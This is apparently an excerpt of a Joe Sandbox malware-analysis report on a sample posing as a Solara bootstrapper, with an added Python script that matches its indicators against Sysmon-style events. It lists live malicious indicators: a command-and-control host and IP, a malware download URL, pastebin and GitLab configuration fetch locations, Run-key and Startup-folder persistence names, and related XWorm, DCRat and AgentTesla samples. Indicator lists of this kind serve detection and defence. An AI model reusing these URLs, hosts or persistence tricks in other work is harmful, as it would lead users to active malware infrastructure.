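The URL and IP tables above give the network side of this infection (the pages.dev download flagged by Avira, the 23.ip.gl.ply.gg / 147.185.221.23 endpoint the IP table marks malicious, and the ip-api.com, pastebin.com and gitlab.com fetches), and the three Autostart entries give the on-disk side (a Run value named "Windows Security Host" pointing at an .exe dropped in the profile root, plus a Startup-folder .lnk). The following Python is an added example, not part of the Joe Sandbox report, that turns those indicators into detection logic over Sysmon-style events. The event records, the "alice" profile name and the field names are constructed for the example; the regexes accept any profile name and the HKCU64 prefix the report shows for the 64-bit registry view, and only the entries the report itself flags are rated high, with contact to the legitimate services rated medium.

```python
"""Match this report's network and persistence indicators against Sysmon-style
events. Added example; the event records below are constructed, not report data."""
import ipaddress
import re
from dataclasses import dataclass

# Network indicators from the report's URL and IP tables. Only entries the report
# itself flags are treated as high confidence.
MALICIOUS_HOSTS = {
    "4d38a1ec.solaraweb-alj.pages.dev",  # Avira URL Cloud: malware
    "23.ip.gl.ply.gg",                    # IP table: Malicious = true
}
MALICIOUS_IPS = {ipaddress.ip_address("147.185.221.23")}  # IP table: Malicious = true
# Legitimate services the sample uses for geolocation/recon and config retrieval;
# contact alone is only medium confidence.
SUSPICIOUS_URL_PREFIXES = (
    "http://ip-api.com/json/?fields=225545",
    "https://pastebin.com/raw/pjseRvyK",
    "https://gitlab.com/cmd-softworks1/a/-/snippets/4768756/raw/main/discord.json",
)

# Persistence artefacts from the Autostart entries. The sandbox profile is "user";
# the patterns accept any profile name and the HKCU64 (64-bit view) prefix.
RUN_VALUE_NAME = "Windows Security Host"
RUN_KEY_RE = re.compile(
    r"^HKCU(?:64)?\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
    + re.escape(RUN_VALUE_NAME) + r"$",
    re.IGNORECASE,
)
RUN_IMAGE_RE = re.compile(r"^C:\\Users\\[^\\]+\\Windows Security Host\.exe$", re.IGNORECASE)
STARTUP_LNK_RE = re.compile(
    r"^C:\\Users\\[^\\]+\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"
    r"Windows Security Host\.lnk$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Finding:
    severity: str  # "high" or "medium"
    rule: str
    evidence: str


def check_network(event: dict) -> list[Finding]:
    """Sysmon event 3 (network connection) or 22 (DNS query)."""
    out = []
    host = (event.get("dst_host") or event.get("query") or "").lower()
    if host in MALICIOUS_HOSTS:
        out.append(Finding("high", "known-malicious host", host))
    ip = event.get("dst_ip")
    if ip and ipaddress.ip_address(ip) in MALICIOUS_IPS:
        out.append(Finding("high", "known-malicious ip", ip))
    url = event.get("url", "")
    if url.startswith(SUSPICIOUS_URL_PREFIXES):
        out.append(Finding("medium", "recon/config fetch url", url))
    return out


def check_registry(event: dict) -> list[Finding]:
    """Sysmon event 13 (registry value set)."""
    target, data = event.get("target", ""), event.get("details", "")
    if RUN_KEY_RE.match(target):
        if RUN_IMAGE_RE.match(data):
            return [Finding("high", "run-key persistence", f"{target} -> {data}")]
        return [Finding("medium", "run-key value name reused", f"{target} -> {data}")]
    return []


def check_file(event: dict) -> list[Finding]:
    """Sysmon event 11 (file create)."""
    path = event.get("path", "")
    if STARTUP_LNK_RE.match(path):
        return [Finding("high", "startup-folder persistence", path)]
    if RUN_IMAGE_RE.match(path):
        return [Finding("medium", "payload dropped to profile root", path)]
    return []


CHECKS = {3: check_network, 22: check_network, 13: check_registry, 11: check_file}


def scan(events) -> list[Finding]:
    """Run every event through the check for its event ID; unknown IDs are ignored."""
    findings: list[Finding] = []
    for ev in events:
        check = CHECKS.get(ev.get("event_id"))
        if check:
            findings.extend(check(ev))
    return findings


# Constructed events (not taken from the report), shaped like Sysmon output.
SAMPLE_EVENTS = [
    {"event_id": 22, "query": "getsolara.dev"},                               # not flagged in report
    {"event_id": 3, "dst_ip": "147.185.221.23", "dst_host": "23.ip.gl.ply.gg"},
    {"event_id": 3, "dst_ip": "208.95.112.1", "url": "http://ip-api.com/json/?fields=225545"},
    {"event_id": 11, "path": r"C:\Users\alice\Windows Security Host.exe"},
    {"event_id": 13,
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Security Host",
     "details": r"C:\Users\alice\Windows Security Host.exe"},
    {"event_id": 11,
     "path": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk"},
    {"event_id": 3, "dst_ip": "104.20.22.46", "dst_host": "www.nodejs.org"},  # not flagged in report
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule}: {f.evidence}")
```

Run against the constructed events, the scan yields four high findings (the ply.gg host, its IP, the Run value and the Startup .lnk) and two medium ones (the ip-api.com lookup and the .exe landing in the profile root), while the DNS query for getsolara.dev and the connection to www.nodejs.org produce nothing, matching the report's own "false" verdicts for those two. The Run-value check is deliberately split: the value name alone is only medium, because a legitimate product could pick the same name, but the name together with an image in the profile root is the exact pair the report observed.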
Match  Associated Sample Name / URL  Detection  Threat Name  Context

208.95.112.1
• (İTOSAM) 11 KASIM 2024 HAFTALIK EKONOMİ BÜLTENİ.exe: malicious, AgentTesla; context: ip-api.com/line/?fields=hosting
• file.exe: malicious, Clipboard Hijacker; context: ip-api.com/line/
• file.exe: malicious, Clipboard Hijacker; context: ip-api.com/line/
• https://storage.googleapis.com/windows_bucket1/turbo/download/TurboVPN_setup.exe: malicious, Unknown; context: ip-api.com/json
• file.exe: malicious, Amadey, Stealc, Vidar; context: ip-api.com/line/
• file.exe: malicious, Unknown; context: ip-api.com/line/
• file.exe: malicious, Unknown; context: ip-api.com/line/
• x.bat: malicious, Unknown; context: ip-api.com/json/?fields=8195
• nuevo orden.exe: malicious, AgentTesla; context: ip-api.com/line/?fields=hosting
• transferencia interbancaria_867897870877.xlam.xlsx: malicious, AgentTesla; context: ip-api.com/line/?fields=hosting

128.116.123.3
• KKjubdmzCR.exe: malicious, DCRat, PureLog Stealer, zgRAT
• hKWBNgRd7p.exe: malicious, XWorm
• SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe: malicious, Unknown
• SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exe: malicious, Unknown
• Roblox Account Manager.exe: malicious, Unknown
• Roblox Account Manager.exe: malicious, Unknown
• SolaraBootstrapper.exe: malicious, DCRat, XWorm
• https://www.roblox.com.zm/login: malicious, Unknown
• RobloxPlayerLauncher.exe: malicious, Unknown

Match  Associated Sample Name / URL  Detection  Threat Name  Context

www.nodejs.org
• KKjubdmzCR.exe: malicious, DCRat, PureLog Stealer, zgRAT; context: 104.20.23.46
• AYUGPPBj0x.exe: malicious, DCRat; context: 104.20.23.46
• IM3OLcx7li.exe: malicious, XWorm; context: 104.20.22.46
• SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe: malicious, Blank Grabber; context: 104.20.23.46
• cgqdM4IA7C.exe: malicious, XWorm; context: 104.20.22.46
• oIDX88LpSs.exe: malicious, XWorm; context: 104.20.23.46
• hKWBNgRd7p.exe: malicious, XWorm; context: 104.20.22.46
• 8svMXMXNRn.exe: malicious, NoCry, XWorm; context: 104.20.23.46
• SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exe: malicious, Unknown; context: 104.20.22.46
• SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exe: malicious, Unknown; context: 104.20.22.46

getsolara.dev
• KKjubdmzCR.exe: malicious, DCRat, PureLog Stealer, zgRAT; context: 104.21.93.27
• AYUGPPBj0x.exe: malicious, DCRat; context: 104.21.93.27
• IM3OLcx7li.exe: malicious, XWorm; context: 172.67.203.125
• SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe: malicious, Blank Grabber; context: 172.67.203.125
• cgqdM4IA7C.exe: malicious, XWorm; context: 172.67.203.125
• oIDX88LpSs.exe: malicious, XWorm; context: 172.67.203.125
• hKWBNgRd7p.exe: malicious, XWorm; context: 172.67.203.125
• SecuriteInfo.com.Variant.MSILHeracles.168781.2591.26227.exe: malicious, Unknown; context: 104.21.93.27
• SecuriteInfo.com.Variant.MSILHeracles.168781.2591.26227.exe: malicious, Unknown; context: 104.21.93.27
• 8svMXMXNRn.exe: malicious, NoCry, XWorm; context: 104.21.93.27

23.ip.gl.ply.gg
• RLesaPFXew.exe: malicious, SilverRat; context: 147.185.221.23
• r8gcHFIf3x.exe: malicious, XWorm; context: 147.185.221.23
• q0SpP6HxtE.exe: malicious, XWorm; context: 147.185.221.23
                                                                                                                                                    edge-term4-fra2.roblox.comKKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                    • 128.116.123.3
                                                                                                                                                    SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                    • 128.116.123.4
                                                                                                                                                    oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 128.116.123.4
                                                                                                                                                    hKWBNgRd7p.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 128.116.123.3
                                                                                                                                                    BootstrapperV1.19.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                    • 128.116.123.4
                                                                                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 128.116.123.3
                                                                                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 128.116.123.3
                                                                                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 128.116.123.4
                                                                                                                                                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 128.116.123.3
                                                                                                                                                    SolaraBootstrapper.exeGet hashmaliciousDCRat, XWormBrowse
                                                                                                                                                    • 128.116.123.3
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| ROBLOX-PRODUCTIONUS | KKjubdmzCR.exe | malicious | DCRat, PureLog Stealer, zgRAT | 128.116.123.3 |
| | AYUGPPBj0x.exe | malicious | DCRat | 128.116.44.3 |
| | IM3OLcx7li.exe | malicious | XWorm | 128.116.44.4 |
| | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | malicious | Blank Grabber | 128.116.123.4 |
| | la.bot.arm.elf | malicious | Unknown | 128.116.110.16 |
| | cgqdM4IA7C.exe | malicious | XWorm | 128.116.21.4 |
| | oIDX88LpSs.exe | malicious | XWorm | 128.116.123.4 |
| | hKWBNgRd7p.exe | malicious | XWorm | 128.116.123.3 |
| | 8svMXMXNRn.exe | malicious | NoCry, XWorm | 128.116.44.3 |
| | https://www.roblox.sc/users/294681399108/profile | malicious | Unknown | 128.116.122.3 |
| TUT-ASUS | (#U0130TOSAM) 11 KASIM 2024 HAFTALIK EKONOM#U0130 B#U00dcLTEN#U0130.exe | malicious | AgentTesla | 208.95.112.1 |
| | file.exe | malicious | Clipboard Hijacker | 208.95.112.1 |
| | file.exe | malicious | Clipboard Hijacker | 208.95.112.1 |
| | https://storage.googleapis.com/windows_bucket1/turbo/download/TurboVPN_setup.exe | malicious | Unknown | 208.95.112.1 |
| | file.exe | malicious | Amadey, Stealc, Vidar | 208.95.112.1 |
| | file.exe | malicious | Unknown | 208.95.112.1 |
| | file.exe | malicious | Unknown | 208.95.112.1 |
| | x.bat | malicious | Unknown | 208.95.112.1 |
| | nuevo orden.exe | malicious | AgentTesla | 208.95.112.1 |
| | transferencia interbancaria_867897870877.xlam.xlsx | malicious | AgentTesla | 208.95.112.1 |
| SALSGIVERUS | 6qwSgLbPO9.exe | malicious | XWorm | 147.185.221.23 |
| | RLesaPFXew.exe | malicious | SilverRat | 147.185.221.23 |
| | mips.elf | malicious | Mirai, Moobot | 147.176.207.108 |
| | rboancbWce.exe | malicious | XWorm | 147.185.221.23 |
| | dUoETPmfo3.exe | malicious | Orcus | 147.185.221.23 |
| | MAqlwGvuGr.exe | malicious | SheetRat | 147.185.221.23 |
| | V2Avz54IzW.exe | malicious | XWorm | 147.185.221.23 |
| | explorers.exe | malicious | XWorm | 147.185.221.23 |
| | wilde.exe.bin.exe | malicious | XWorm | 147.185.221.23 |
| | 7jgFDJY46m.exe | malicious | Njrat | 147.185.221.23 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| 3b5074b1b5d032e5620f69f9f700ff0e | Unit 2_week 4 2024.pptx | malicious | HTMLPhisher | 128.116.123.3, 104.21.93.27, 104.20.22.46 |
| | https://url.us.m.mimecastprotect.com/s/7XsKCQWmqkh6El9PsPhEHGZMGK?domain=hbgone.docdroid.com | malicious | Unknown | 128.116.123.3, 104.21.93.27, 104.20.22.46 |
| | https://www.google.ml/url?fvg=1YI3fC8whlGPBCiMyiuQ&bhtBf=8EQhXbuMThqowIo0zyCX&sa=t&ndg=afydNw3nDHf9A6uq2MCH&url=amp%2Fiestpcanipaco.edu.pe%2F.r%2Fu1kOgE-SURELILYYWRhcnNoLm1hbGhvdHJhQGphdG8uY29t | malicious | HTMLPhisher | 128.116.123.3, 104.21.93.27, 104.20.22.46 |
| | ATT61999.htm | malicious | HTMLPhisher | 128.116.123.3, 104.21.93.27, 104.20.22.46 |
| | INQ02010391.vbs | malicious | Snake Keylogger, VIP Keylogger | 128.116.123.3, 104.21.93.27, 104.20.22.46 |
| | Company Profile_pdf.exe | malicious | GuLoader | 128.116.123.3, 104.21.93.27, 104.20.22.46 |
| | https://forms.office.com/Pages/ShareFormPage.aspx?id=xW69F1aTs06UvACEsnZeONWs3ov4-fZJk9ZDjpIIN5tUMUFMSUpJVVFUWEtHTFlURVNUWE1QV1hXQi4u&sharetoken=2Z2A4vYPJAA4bBGx5zDg | malicious | HTMLPhisher | 128.116.123.3, 104.21.93.27, 104.20.22.46 |
| | Draft_Order_Form_6335_pdf_nsg.pdf | malicious | HTMLPhisher, Mamba2FA | 128.116.123.3, 104.21.93.27, 104.20.22.46 |
| | https://forms.office.com/Pages/ShareFormPage.aspx?id=xW69F1aTs06UvACEsnZeONWs3ov4-fZJk9ZDjpIIN5tUMUFMSUpJVVFUWEtHTFlURVNUWE1QV1hXQi4u&sharetoken=2Z2A4vYPJAA4bBGx5zDg | malicious | HTMLPhisher | 128.116.123.3, 104.21.93.27, 104.20.22.46 |
| | file.exe | malicious | LummaC | 128.116.123.3, 104.21.93.27, 104.20.22.46 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | KKjubdmzCR.exe | malicious | DCRat, PureLog Stealer, zgRAT | |
Process: C:\Windows\System32\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.2704320226484662
Encrypted: false
SSDEEP: 192:p2ZgHcTwr0bU9+dQu65a+xejol2/fsLzuiFsZ24lO8q5:pMgHcTPbG+dQ1a+l23sLzuiFsY4lO8a
MD5: 021B6C5D35A5377878CBA5978E0E072D
SHA1: 3A2FE7E806404DBFF013F079B1F6753633765F2A
SHA-256: F3936D8EDBD6BB57900708AF7F789FA1D6D19FC26243171C1CBF5CB54E978271
SHA-512: 182F3161671DD326A8F2FFC06A794CCBA8FBCF12CB4AB2F9EC3F021E9A841B7C3D7E4E24A83EACF0FA2CA96C5EFD2DBBCE0D3D9E42FA46407E45DB4882C93053
Malicious: false
Preview (UTF-16 decoded): Version=1 EventType=CLR20r3 EventTime=133760852508247683 ReportType=2 Consent=1 UploadTime=133760852517153922 ReportStatus=524384 ReportIdentifier=abf3f392-340e-42d3-be22-ab1c93f18fd7 IntegratorReportIdentifier=ada28f15-91c6-4ac4-a921-98227c3ed3db Wow64Host=34404 NsAppName=BootstrapperV1.23.exe OriginalFilename=SolaraBootstrapper.exe AppSessionGuid=00000fe0-0001-0014-b7ff-4e5cc936db01 TargetAppId=W:00062fe173631cadc4a7695d39957a12de9c00000000!000030231a467a49cc37768eea0f55f4bea1cbf
Process: C:\Windows\System32\WerFault.exe
File Type: Mini DuMP crash report, 16 streams, Thu Nov 14 19:14:11 2024, 0x1205a4 type
Category: dropped
Size (bytes): 605734
Entropy (8bit): 3.2960105305598377
Encrypted: false
SSDEEP: 3072:KZsHpbekFpEo3+vboVmfyBOXpIymdSZCdhWRrAm4WPVjNpZOD0RvaXcS3eq7qe7W:skbesEo3QAhQHXdpX1uuarMNqJbq
MD5: B1B2AE53236596FF126B2B885807DBC4
SHA1: E4D420E434064CD7CAE4137B475FBC1177651BFA
SHA-256: 191E71DA695634E17A11EF12E5B79E1F89622A84A5344CF14A486E21016C58CD
SHA-512: DDDD38FE73F7A476F8300FDC7933424F8835D80C95104D9A1F0EEC608A36FFA4E1A5E13B8C783FD5F561F72C5D31AF5C973D2186AEBD65DD2B40BACF74C5370D
Malicious: false
                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6820
                                                                                                                                                      Entropy (8bit):3.7174364199647982
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:R6l7wVeJ6oZzMMtYZK8Tprk89bG/Ef09Cm:R6lXJVZzMMtYAEGsfQ
                                                                                                                                                      MD5:E9CAC4DC66C260E7C923D0651383CCB7
                                                                                                                                                      SHA1:7D4844ADC8CE49E5B396DCA8EC10EE0D6AB74009
                                                                                                                                                      SHA-256:F6714032B2B00ADDF9C5AA57A90A050DB928DC791D3B45F4E0B8E78A02C952FD
                                                                                                                                                      SHA-512:FB8BC740AEFD1F7732E852A80A137201BFCAC08458776C254554D0A5E5F179FC3CA1C103EA3664A8027C64D1DB09BEE67BCA991631B59A2B83370950BA074762
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.6.4.<./.P.i.
                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4834
                                                                                                                                                      Entropy (8bit):4.46829897990708
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:cvIwWl8zstJg771I93MWpW8VYYpYm8M4JQKy/F4Qyq8vaygDx5b5Rd:uIjfHI7kl7V+JGWaf1Rd
                                                                                                                                                      MD5:48177B2B2170E81572E988DD1CAB60EC
                                                                                                                                                      SHA1:9012FAC33EE232A28E9F66C496285E836E24412F
                                                                                                                                                      SHA-256:8534E9B8003B099D6E6E121CC5BD26A9D3231901C85746E0F4E8EC587E66192A
                                                                                                                                                      SHA-512:9F0A4C4C2F6A06F0EC203C683316D74A112C201AC93299518080487A36E800B1F177D59BD76B031CA94708F2825B778192C75D4C56BF3522E40611F2F84D8414
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="588136" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                      Process:C:\Users\user\Desktop\8Hd0ZExgJz.exe
                                                                                                                                                      File Type:CSV text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):654
                                                                                                                                                      Entropy (8bit):5.380476433908377
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                      MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                      SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                      SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                      SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Injector.exe
                                                                                                                                                      File Type:CSV text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1492
                                                                                                                                                      Entropy (8bit):5.3787668257697945
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhwE4ksKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHf
                                                                                                                                                      MD5:761D1106534DF52590D691CAD8962C57
                                                                                                                                                      SHA1:D3678D8F8635FF85D354F7EE2FFC24008357DC5B
                                                                                                                                                      SHA-256:73784F8EEA9F790E13C7DA5137D0735B161D974DE8F748ABFD4A3951CE91FAB2
                                                                                                                                                      SHA-512:AA3595F2936C95C599C6E8C2784CA18FDC7DE34F290D38B56FCC52D82CDCBF002EAE0BB16DD6355DC8AD85F6DCC69246FD3D07274A49C9914F4769F256BA16ED
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System
                                                                                                                                                      Process:C:\Users\user\Windows Security Host.exe
                                                                                                                                                      File Type:CSV text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):654
                                                                                                                                                      Entropy (8bit):5.380476433908377
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                      MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                      SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                      SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                      SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):64
                                                                                                                                                      Entropy (8bit):0.34726597513537405
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Nlll:Nll
                                                                                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:@...e...........................................................
                                                                                                                                                      Process:C:\Users\user\Desktop\8Hd0ZExgJz.exe
                                                                                                                                                      File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):819200
                                                                                                                                                      Entropy (8bit):5.598261375667174
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:qhd8cjaLXVh84wEFkW1mocaBj6WtiRPpptHxQ0z:2ycjar84w5W4ocaBj6y2tHDz
                                                                                                                                                      MD5:02C70D9D6696950C198DB93B7F6A835E
                                                                                                                                                      SHA1:30231A467A49CC37768EEA0F55F4BEA1CBFB48E2
                                                                                                                                                      SHA-256:8F2E28588F2303BD8D7A9B0C3FF6A9CB16FA93F8DDC9C5E0666A8C12D6880EE3
                                                                                                                                                      SHA-512:431D9B9918553BFF4F4A5BC2A5E7B7015F8AD0E2D390BB4D5264D08983372424156524EF5587B24B67D1226856FC630AACA08EDC8113097E0094501B4F08EFEB
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: KKjubdmzCR.exe, Detection: malicious
